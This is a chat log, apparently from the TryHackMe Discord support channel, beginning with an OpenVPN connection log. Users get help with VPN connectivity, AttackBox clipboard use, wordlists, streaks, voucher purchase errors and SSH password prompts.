2022-12-26 11:04:47 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-12-26 11:04:47 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-12-26 11:04:47 TCP/UDP: Preserving recently used remote address: [AF_INET]54.193.147.96:1194
2022-12-26 11:04:47 Socket Buffers: R=[212992->212992] S=[212992->212992]
2022-12-26 11:04:47 UDP link local: (not bound)
2022-12-26 11:04:47 UDP link remote: [AF_INET]54.193.147.96:1194
2022-12-26 11:04:47 TLS: Initial packet from [AF_INET]54.193.147.96:1194, sid=aebd30ad 25f6c03d
2022-12-26 11:04:47 VERIFY OK: depth=1, CN=ChangeMe
2022-12-26 11:04:47 VERIFY KU OK
2022-12-26 11:04:47 Validating certificate extended key usage
2022-12-26 11:04:47 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2022-12-26 11:04:47 VERIFY EKU OK
2022-12-26 11:04:47 VERIFY OK: depth=0, CN=server
2022-12-26 11:04:47 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 2048 bit RSA, signature: RSA-SHA256
2022-12-26 11:04:47 [server] Peer Connection Initiated with [AF_INET]54.193.147.96:1194
2022-12-26 11:04:48 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)

2022-12-26 11:04:48 PUSH: Received control message: 'PUSH_REPLY,route 10.10.0.0 255.255.0.0,route 10.1.0.0 255.255.0.0,route-metric 1000,route-gateway 10.13.0.1,topology subnet,ping 5,ping-restart 120,ifconfig 10.13.11.218 255.255.128.0,peer-id 79'
2022-12-26 11:04:48 OPTIONS IMPORT: timers and/or timeouts modified
2022-12-26 11:04:48 OPTIONS IMPORT: --ifconfig/up options modified
2022-12-26 11:04:48 OPTIONS IMPORT: route options modified
2022-12-26 11:04:48 OPTIONS IMPORT: route-related options modified
2022-12-26 11:04:48 OPTIONS IMPORT: peer-id set
2022-12-26 11:04:48 OPTIONS IMPORT: adjusting link_mtu to 1624
2022-12-26 11:04:48 Using peer cipher 'AES-256-CBC'
2022-12-26 11:04:48 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-12-26 11:04:48 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-12-26 11:04:48 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-12-26 11:04:48 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-12-26 11:04:48 net_route_v4_best_gw query: dst 0.0.0.0
2022-12-26 11:04:48 net_route_v4_best_gw result: via 192.168.254.254 dev enp0s3
2022-12-26 11:04:48 ROUTE_GATEWAY 192.168.254.254/255.255.255.0 IFACE=enp0s3 HWADDR=08:00:27:d0:71:70
2022-12-26 11:04:48 TUN/TAP device tun0 opened
2022-12-26 11:04:48 net_iface_mtu_set: mtu 1500 for tun0
2022-12-26 11:04:48 net_iface_up: set tun0 up
2022-12-26 11:04:48 net_addr_v4_add: 10.13.11.218/17 dev tun0
2022-12-26 11:04:48 net_route_v4_add: 10.10.0.0/16 via 10.13.0.1 dev [NULL] table 0 metric 1000
2022-12-26 11:04:48 net_route_v4_add: 10.1.0.0/16 via 10.13.0.1 dev [NULL] table 0 metric 1000
2022-12-26 11:04:48 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2022-12-26 11:04:48 Initialization Sequence Completed

Can you regenerate your VPN file and try again?

eys

eys

yes

This looks like a completed connection. From another terminal, can you ping 10.10.10.10 or curl http://10.10.10.10/whoami?

i tried pinging 10.10.10.10 but still nothing

Can you post a screenshot? You'll need to verify your THM account first

!docs verify

!docs verify

thx @broken bear

Gave +1 Rep to @broken bear

!docs

this is the openvpn outout

*output

can you show the output of curl http://10.10.10.10/whoami as juun said

this is the output from my host machine

have you tried regenerating though?

yes i did

in the second terminal, can you show ip a

so you are running the vpn in the host or in the guest vm?

i am running it in the guest machine

so you will not be able to access 10.10.10.10 from the host with the vpn in the guest

that's not how network segmentation works in this case

from the guest, open a new terminal and try the ip a ping and curl commands again

ok

this is from the guest

Open a new tab, while VPN sequence is on (It needs to be in same machine)

ok

Hold up, we need to clear a couple of misconceptions up

If you hit CTRL-C What signal does it send to the open window?

are you using macos terminal or a virtual machine?

@tribal mason Stop for a minute. You are trying to troubleshoot without having enough info.

after i press ctrl c this iswhat pops up

Thatt's not what I asked.

When you press CTRL-C what signal does *nix send to the terminal or running program?

I'm asking this because I am not convinced you understand some of the basics that you need to understand to troubleshoot this in the future.

i do not understand, how can i see the *nix ?

ill open the vm with a gui

*nix is the type of operating system. In this case, it looks like your terminal is Ubuntu, right?

yes

it is ubuntu

What does CTRL-C do in Ubuntu?

it stops the program

Right. Specifically, it sends the SIGTERM or SIGINT, which is a signal to terminate or interrupt the program.

So if openvpn is connected, and you send SIGTERM, it stops the openvpn program.

To check for your VPN connectivity, you need to either run the openvpn in a background process, or open another terminal after you connect.

Ok, that makes cense. Thanks for the responce.

Gave +1 Rep to @cobalt crown

The Kali implementation of gnome network manager is known to be buggy with certain kinds of openvpn profiles. It is recommended to use the CLI in kali.

Thanks, Juun, for reminding me; I'll be cautious in the future about that.

i open it in another tab and pinged 10.10.10.10

it works

The thing about troubleshooting is that you need to know specifics before you can move forward. Making assumptions about gaps creates a lot more work

Do you understand why it wasn't working, now?

kinda, i think i closed the openvpn and was trying to access the network but it was closed. So i couldnt access the network

Yep

dope !! thanks !!

A good check is to run the ip addr show command, it will show you all the interfaces that have an IP address

For openvpn, you are looking for the tun0 interface

You can also check if THM thinks you are conneced in the THM web page

ok :)))

I'm having an issue where i'm unable to copy and paste from the left side into the attack box. I have tried using that, and the kali attack box version. ive also tried using external keyboard too. For example, right now im in the John The Ripper room and I cant copy a hash into the terminal. I have made sure to also be pressing ctrl+shift+C. The issue persists across rooms too

Rooms? like can you copy paste in your main PC?

Yes, I can copy and paste in my main PC.

It's perhaps you didn't allow clipboard permissions for tryhackme in your browser then, check for that

Just checked, that's not it

I ran into this issue last night. Tried terminating the room and bringing back up again and again this morning, same issue.

Can you paste things from the clipboard part of attackbox? (If you click the arrow on the left hand side of the attackbox, it should give you box you can use to interact with the AttackBox clipboard)

https://media.discordapp.net/attachments/692456966802374687/921063860318924800/clipboard.gif

Didn't even know that existed. Yes I can

Keep up hacking then mate 🙂

So that's the official way to copy and paste? It wont do it straight into terminal from side window with the lesons?

It requires clipboard permission but apparently There's something with it in your browser settings

I'll figure that part out on my own. It's good to hear that there is something I can use otherwise. Thanks a lot for the help!

No problem!

Hey, Im connecting to THM through openVPN on a Ubuntu VM. It gives me an IP that I can see in the top right corner of the browser when I'm in the room, but all of the URLs (http://MACHINE_IP/) do not get regenerated with my machine IP. Clicking the links gives me a 404 error, manually entering the machine IP I get into the URL throws 404. nmap scan on the IP I get shows all ports are closed.

Can you enter http://10.10.10.10/ with a VPN connected?

yes. It shows my IP is 10.2.19.174

Do you know where you should go for in a room?

sorry I don't understand the question. I'm trying to do Task 4 of contentdiscovery (machine_ip/sitemap.xml)

Yeah, have you seen this button before?

ohhhh.... I thought you only had to do that if using attackbox in browser

This machine is used for gaining access to room resources

gotcha ok.

thank you

and this is the IP of your connection in the VPN

(You will use it to communicate with room machines)

For example, reverse shells

Ok I got it now thank you... always something way simpler than you think.

u da man dr heap

😁

sorry one more question... am I still limited to 1 hour per day if im accessing through openvpn?

Nope, That's Attackbox which is used to do rooms instead of having a VM. And It has a lot of stuff automatically installed.

👍

I'm working on the Holo network, and am up to the point where I have to open a reverse shell to escalate privs. I've done this 10000 times on the tryhackme attack box, but for whatever reason, I can't seem to get a reverse shell working via tun0/openvpn. on my machine. This isn't a new problem; just the first time I got annoyed enough to post.

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.50.104.xxx

My eth0 is a local 10.0.whatever, which I set up using instructions from Network Chuck's site for virtualbox.

My setup is a bit nonstandard, so that could be the issue. I'm using virtual box with a kali image. I've got internet connection via wireless adapters (NAT and Bridged), and tun0 shows up within the Holo domain. At times I swap back and forth if I'm attaching machines to VBox, as opposed to using something like try hack me. Everything else seems to work (ping, curl, nmap, etc).

Is there something obvious that I can check to get this working? Also, I'm assuming I can't connect to these networks from the attack boxes?

can someone help me out, or nudge me in the direction i need to go...
i installed openvpn. its connected. i can open 10[.]10[.]10[.]10 just fine and i can see the flag and the ip of my connection.

but i can't open the ip address for my active machine for the tasks (currently catching up on the AoC2022 stuff.

Did you wait couple of minutes before accessing the deployed Room Machine?

yea. i started the machine over 10 mins ago.

Can you re-deploy it and wait 5 minutes at least?

i've been like, trying to access through openvpn for the past hour. i can access 10101010 just fine and i can see the vpn/thm ip just fine. but when i try to go on the module. i get err_connection_refused

Which task are you in?

task 19/day 14

so you can't access 8080 port?

oh. is that all that i needed to do... it works now if i specify the port

Yeah It's specified in the task

ohhh. ok. ty. i usually fire up the machine and work through it as i read from top down.

thank you so much!

No problem mate

Hope you can catch it before it ends

hope so. i was late to the party working on an intro securities course through school. instructor told us about this just as we were wrapping up a final exam and term project as day 9 was released

Hello, how do I become verified on this discord channel? I would love to include my videos to the THM site and #thm-community-media channel. Thanks!

Got it, thanks!

!docs verify

Any discount codes available? Really want to get the Yeti t-shirt but its a little pricey to Canada. Thanks!

There is a giveaway contest on twitter. @realtryhackme

I dropped off Twitter a while ago. Oh well. Guess I will have to think about this a little more.

hey can anyone help me with msfconsole

I'm missing the tun0 in my system config

how can i help with that?

@spare laurel look through the pinned messages of this thread, there's a few on vpn issues. Perhaps there is something there that can help you

#site-support message

for example ^

I didnt really read the chat of what you already tried but .. yeah have a look in pinned 🙂

it says device tun0 not found

Wait, can you send me the output of systemctl status openvpn?

You don't have a network vpn activated, (or a personal one) do you?

nope

Have you tried to use the teoublesho vpn script to see of that fixes it?

yes it says tun0 not found

can you try re-installing openvpn?

And the cli output isn't restarting?

sure but how

here what it says

[+] Stable internet connection
[+] OpenVPN is installed
[-] tun0 interface does not exist
Would you like the script to attempt a connection automatically (Y/n)? y
[+] Connecting....
[Warning!] Connection process is taking longer than expected to complete

sudo apt-get --purge remove openvpn

That's not the output I was looking for

I was looking for the VPN script output

oh

He doesn't have the tun0 interface installed

yep exactly

In my experience if the script isn't working properly the tun0 isn't there to be selected from

wait what the output u want to see

The end line.

Or if there is any errors.

Hey Mr_Code, have you installed the openvpn or it exists by default?

it exists by default

it keeps restarting by itself after couple mins

it was working at first idk what happened

Have you tried to regen a new one today?

yes multiple times

Or is your host network being a problem?

nah i can browse perfectly

Why does the script say its restarting?

so you can't connect it right now?

can you show the output of sudo openvpn YourVPNFile.ovpn

Lmao what the

it worked by itself

It should work normally...

It was restarting...

yes

I'm being impatient again, I'll just blame my sleepness

So it won't work normally of it's constantly restarting.

Sorry*

If*

thank u all guys fr much respect 🫡

Gave +1 Rep to @tribal mason

You can ping 8.8.8.8 in your main os while you're doing rooms so you can determine if it's your network or tryhackme's VPN

But if it cuts off even for a second, the vpn will start restart.

For directory bruteforcing?

Yes you can.

Should you? Probably not a good idea.

rockyou is more password list than folder/directories

You will need to use dirbuster wordlists which is in /usr/share/wordlists/dirbuster

You don't need to use them.

SecLists is a good alternative.

Yeah, or seclists located in /usr/share/seclists

i can't find seclists at all

It's not in debian by default i think

how can i get then

GitHub

get kali u potato 🙂

oh ok

yeah sure i will

from https://github.com/danielmiessler/SecLists

well ..
OS: Kali GNU/Linux Rolling x86_64

i think i thought it was debian but it's kali

get vm version and is faster

thx

Gave +1 Rep to @tribal mason

w8. you running kali not debian

yes

xD

Kali is Debian-based

that's what i was saying

we thinked is not kali at first indeed

hey! I have a question to Fowsniff CTF (https://tryhackme.com/room/ctf): i did all tasks (100% complete), but it seems that I only get 30+30 points for the two questions where I had to enter something. however - according to the scoreboard, all other users got 450 points (instead of just 60): see also: https://paste.pics/11c490bc030f49c6e4460007a4156496
has the room changed previously or am I doing something wrong?

It's giving extra points to first 10 users and the room is 992 days old

Is there a reason my machines "run out" despite having ample time left (over and hour or just under) and even when I hit extend it still closes?

It's sometimes buggy with caching, you need to refresh the page occasionally and click extend after you've refreshed it

!docs studen

!docs student

Anyone know why my new-ish TP link router isn't getting a WAN ip assigned by the modem? I went back to the older asus router and it works fine. I've even set up the static wan ip on the TP link and it still won't connect.

This channel is for tryhackme related tech support, please use #infosec-general for technical questions outside that scope

Woops sorry. Read it wrong. Apologies

Not an issue 🙂

Anyone else ever experience losing their daily streak despite doing it everyday? I have made sure to do a little everyday but I seem to have lost it today despite doing it yesterday?

Try ctrl and F5.

If that doesn't work, you could contact support

!email

Thank you!

Gave +1 Rep to @weary spindle

Hey!
can anyone help me out why it still shows in my rooms, even tho i;ve completed the room ? it still shows as uncompleted ?

like a few days back, it was showing normally and suddenly now even the old machines which I completed about a month a ago were coming up on "My rooms" tab and when I click "Hide completed machines", it still shows the completed ones

what happens if you contrl f5 refresh your "my rooms" page

sometimes, it will glitch out and you just untick and retick the box for "Hide completed machines"

I think im a script kiddie enough to refresh the site 😂 , thats my first troubleshooting step in anything

that's why I suggested it 😛

but it still shows that, it didn't until yesterday, and now I just checked it and BOOM

maybe it will fix itself in a day or 2

just try unchecking "hide completed machines" and retick it as well, just to make sure

done that as well!

Because I know on search it glitches out there

D:

no luck! all the machines which I completed are all showing up

actually

it might just be the whole site for that page

I just checked mine as well, and same thing as you

aaaah

yeah I think they will fix it soon

I just paniked I was like hold up! 😂

Yup. It also counts differently than the activity calendar too.

Does anyone can help me know what is the time period considered for counting streak. Like EST, MST, etc. This is 2nd time I lost my streak even after completing events today but it is showing zero events in Yearly activity.

Whichever time period you're on.

I think it is not working according to my local time period.

I need to stop automatically subscription renewal

There is a red button on your sub section of your profile.

Yeah but I have a valid subscription I still need it
I want to cancel the automatic renewal without lose this month subscription

You won't lose the sub, it will just turn off the auto renew.

Hi i don't get redeem code

Hello anyone here to help

?

Hello i paid the subs but all i saw is 404 page what happend ?

better contact support with e-mail

!email

My bagde is being automatically resets to 0 for the past 2 days?
Anyone facing the same issue?

@royal widget
Facing the same issue, twice

I think e-mailing support will be faster way to tell staff

Already sent an email to support, autoreply said 1-3 days to get a reply

When did you send?

About 1 minutes ago

10

Jabba will reply today ig (Not sure)

Ok

@zealous linden Im facing that 4 time lmao

I thought that first time I fell victim for phishing although I know I did everything right, so I bought the vouchers again but same issue 😂

I hope they fix it fast i still keep proof anyway xD

Payment processed on both, so I should get a refund or double vouchers

Yes via email or should get a refund

I'd not expect a reply today from Support.

The event ending they will be swamped with "Did I win" and "When is the announcement" E-mails.

@bronze vale Sorry for pinging but this was kinda important

Huh?

Not sure this is the right place for this, but I just tried buying a voucher on TryHackMe and the payment went through but I got taken to a "Uh-oh, this page has been lost in the matrix." page and can't see the voucher code. I tried again (didn't realize the payment had worked the first time) and the same thing happened. Can someone help me access the two voucher codes (don't need a refund for the 2nd one, I'll give it away).

either email support or we could wish for good luck with @bronze vale

!email

ty

Shoot me a DM please 🙂

hello

@heavy ginkgo support

Ask in #general, not here

Is it only me, that "Hide Completed" checkbox in My Rooms panel is not working? request looks ok: https://tryhackme.com/api/my-rooms?page=1&filterCompleted=true&type=joined, but in response I'm getting rooms that I completed before with boolean userCompleted: false. Does it work for you guys?

Hopefully in the right place. Doing ssh in the attackbox and im getting "Authenticity of host "MACHINE_IP" cant be established then wafflw about permanently adding IP into list of know host. It then comes up with the password section to type into and it wont let me type in there at all, only key that works is Enter and that comes up with password error as it would. I am connected to the openVPN and using the machines inside the rooms. Any help would be great beacuase Im having to skip all SSH missions at the moment.

Just type the password and press enter, the password prompt is not going to show you any characters while entering

i swear if ive been that dumb lol

thanks ill try now

legend thank you

Gave +1 Rep to @crystal marlin

I have the same problem - the wordpress login page is not working... I even tried it with the attack box. Have you found a solution?

how long does the support email take to get back to you

Yup. It is buggy and broken.

#site-bugs

hello, anyone know how to change username?

Contact support.

!email

How? Do you have anything to back this claim up? cc @nocturne dirge Streaks are based in your own timezone and reset at midnight

https://tryhackme.com/api/user/update-timezone
This will update your TZ.

Hi there.
Bought a voucher,transaction went through but error 404 received and no voucher neither in dashboard or email.
Where I can report this?

@bronze vale

We’re investigating this :)

Send me an email please

support@tryhackme.com

Okay, I'll redirect them to the email then

Thank you all guys.
All solved very fast.
Kudos

SOC-LEVEL-1 task 5 of Threat Intelligence Tools cannot access internet over browser. Any solutions?

Are you sure it's https:// instead of http://

i even tried accessing google, it is not taking me to any website, every time same issue

The target machine does not have internet access. Load the site on the AttackBox or on your local attacking machine. 🙂

Oh yup, It's a target machine... mb

how to shift task files from target machine to my own vm?

You don't need to do it as Target machine should have resources for the room

but the target machine is not able to access internet to scan it on phistool

You can register phishtool (as it's a website) in your VM and use task files for this room

Got it, thanks

Gave +1 Rep to @tribal mason

I can just share my yearly activity screenshot. What else I can have to proof?

activity != answering questions

You need to answer a question for the streak to keep up

Yes I answered questions every single day

On every box I'm loading. Connected via OpenVPN and confirmed through THM site. Just randomly started. Just me?

Can you access http://10.10.10.10/ while VPN is on?

Yep